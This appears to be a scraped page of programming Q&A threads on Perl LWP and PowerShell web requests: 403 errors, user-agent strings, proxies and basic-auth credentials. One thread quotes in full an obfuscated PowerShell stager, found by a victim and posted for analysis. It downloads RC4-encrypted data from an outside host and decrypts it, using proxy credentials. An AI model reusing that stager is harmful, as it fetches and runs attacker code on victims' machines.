http 403 when accessing an url in perl - perl

I want to access a webpage but I'm getting 403, failure for THIS url.
But when I access using Firefox it shows HTTP 200 OK.
This is the code I'm using to access it:
my $agent = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1, timeout => 30, agent => "Mozilla/5.0");
my $header = HTTP::Request->new(GET => $link);
my $request = HTTP::Request->new('GET', $link, $header);
my $response = $agent->request($request);
if ($response->is_success){
........

Your code worked fine on my system accessing one of my own sites. I would guess that the website you hitting is allergic to automated requests. The user agent you are using is very minimal, and they may reject anything that does not look real. Here is a more genuine agent:
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24"

Related

Can't connect to ... nodename nor servname provided, or not known

My question: why does my perl script--successful via home laptop--not work when run in the context of my hosting website? (Perhaps they have a firewall, for example. Perhaps my website needs to provide credentials. Perhaps this is in the realm of cross-site scripting. I DON'T KNOW and appeal for your help in my understanding what could be the cause and then the solution. Thanks!)
Note that all works fine IF I run the perl script from my laptop at home.
But if I upload the perl script to my web host, where I have a web page whose javascript successfully calls that perl script, there is an error back from the site whose URL is in the perl script (finance.yahoo in this example).
To bypass the javascript, I'm just typing the URL of my perl script, e.g. http://example.com/blah/script.pl
Here is the full error message from finance.yahoo when $url starts with http:
Can't connect to finance.yahoo.com:80 nodename nor servname provided, or not known at C:/Perl/lib/LWP/Protocol/http.pm line 47.
Here is the full error message from finance.yahoo when $url starts with https:
Can't connect to finance.yahoo.com:443 nodename nor servname provided, or not known at C:/Perl/lib/LWP/Protocol/http.pm line 47.
Code:
#!/usr/bin/perl
use strict; use warnings;
use LWP 6; # one site suggested loading this "for all important LWP classes"
use HTTP::Request;
### sample of interest: to scrape historical data and feed massaged facts to my private web page via js ajax
my $url = 'http://finance.yahoo.com/quote/sbux/profile?ltr=1';
my $browser = LWP::UserAgent->new;
# one site suggested having this empty cookie jar could help
$browser->cookie_jar({});
# another site suggested I should provide WAGuess
my #ns_headers = (
'User-Agent' =>
# 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Accept' => 'text/html, */*',
'Accept-Charset' => 'iso-8859-1,*,utf-8',
'Accept-Language' => 'en-US',
);
my $response = $browser->get($url, #ns_headers);
# for now, I just want to confirm, in my web page itself, that
# the target web page's contents was returned
my $content = $response->content;
# show such content in my web page
print "Content-type: text/html\n\n" . $content;
Well it is not obvious what is your final goal and it is possible that you over complicate the task.
You can retrieve above mentioned page with simpler perl code
#!/usr/bin/env perl
#
# vim: ai:ts=4:sw=4
#
use strict;
use warnings;
use feature 'say';
use HTTP::Tiny;
my $debug = 1;
my $url = 'https://finance.yahoo.com/quote/sbux/profile?ltr=1';
my $responce = HTTP::Tiny->new->get($url);
if ($responce->{success}) {
my $html = $responce->{content};
say $html if $debug;
}
In your post you indicated that javascript is somehow involved -- it is not clear how and what it's purpose in retrieving of the page.
Error message has a reference to at C:/Perl/lib/LWP/Protocol/http.pm line 47 which indicates that web hosting is taking place on Windows machine -- it would be nice to indicate it in your message.
Could you shed some light on purpose of following block in your code?
# WAGuess
$browser->env_proxy;
# WAGuess
$browser->cookie_jar({});
I do not see cookie_jar be utilized in your code anywhere.
Do you plan to use some authentication approach to extract some data under your personal account which is not accessible otherwise?
Please state in a few first sentences what you try to achieve on grand scale.
Perhaps it's about cookies or about using yahoo's "query" url instead.
Yahoo Finance URL not working

Where can I set the useragent in Strawberry Perl's config?

We have a proxy server here and all internet traffic is going through that. The command: cpan package fails with the following error:
LWP failed with code[403] message[Browserblocked]
I think, only specific browsers are let through the proxy server, so I need to set the useragent for cpan. Where can I set it? I don't see anything similar in o conf.
Rewriting the code of site\lib\LWP\UserAgent.pm
sub _agent { "libwww-perl/$VERSION" }
say to:
sub _agent { 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0' }
solves the problem, but is this really the official solution?

phishing power shell script found

Some please help me to analyse this code.
[SYstem.NEt.SeRVICEPoiNtMAnagEr]::EXPecT100CONtinue=0;$wC=NEW-ObJECt SYsteM.NEt.WebCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wC.HEADerS.Add('User-Agent',$u);
$wC.PROxY=[SYstem.NEt.WeBReqUest]::DeFaULtWeBPrOxy;
$Wc.PRoXy.CRedEntiALS = [SYSTEM.NET.CReDENTiAlCaCHe]::DEFAULTNETwORkCREdENTIalS;
$Script:Proxy = $wc.Proxy;$K=[SYstem.TeXT.ENcodiNg]::ASCII.GetBYTEs('3c9825ffc1d70f40ec648606c637200d'); $R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}}; $ser='http://colo.myftp.org:4445';$t='/admin/get.php';$wC.HEadeRs.ADD("Cookie","session=R9rR6fhOaMdGNJI1saLgl2JtVSY="); $daTA=$WC.DOWnlOADDATa($SER+$T); $IV=$DATa[0..3];$DaTA=$dATa[4..$dATa.lENGTH];
-JOiN[ChAR[]](& $R $dAta ($IV+$K)) write-host $R
someone tries to access my system,i just extracted some code blocks from there application. Please help me to analyse this code.

LWP::UserAgent and login credentials

I'm trying to set up the credentials with LWP::UserAgent, but I'm not able to log in. $username, $passwd are correct. I don't understand what should I put in 3rd argument(according to dos $realm, here Authentication). Here the snippet:
my $browser = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060719 Firefox/31.2.0',
$browser->credentials("domain.com:80", "Authentication",$username, $passwd);
my $response=$browser->get("http://domain.com/page");
print $response->content;
I corrected realm as #ThisSuitIsBlackNot suggested:
Close your browser and reopen it. Navigate to http://domain.com/page.
If the site is using basic authentication,
you should get a popup that says something like
A username and password are being requested by
http://domain.com. The site says: "foo bar".
In this case, foo bar is the realm.
Then I was able to login, but the pages were empty.
So I have added a cookie:
$browser->cookie_jar({ file => ".mycookies.txt" });

Powershell: Downloadfile 404 but site exists

I'm having a little problem which looks very simple... but I just don't get it!
I try to download the website content of: http://cspsp.gshi.org/ (if you try to access it via www.cspsp.gshi.org you get to the wrong page....)
For this I do it like that in Powershell:
(New-Object System.Net.WebClient).DownloadFile( 'http://cspsp.gshi.org/', 'save.htm' )
I can acess the website with Firefox and download its contents easily but Powershell always outputs something like that:
The remoteserver returned an Error: (404) Nothing found. (translated from German).
I'm not sure what I'm doing wrong here. Other websites like Google just work fine.
It appears that the site relies on the User-Agent request headers being sent by HTTP clients, and that System.Net.WebClient doesn't send even a default value (at least, it didn't when I hit my own, local servers.)
Either way, this worked for me:
$request = (New-Object System.Net.WebClient)
$request.headers['User-Agent'] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.40 Safari/537.17"
$request.DownloadFile('http://cspsp.gshi.org/', 'saved.html')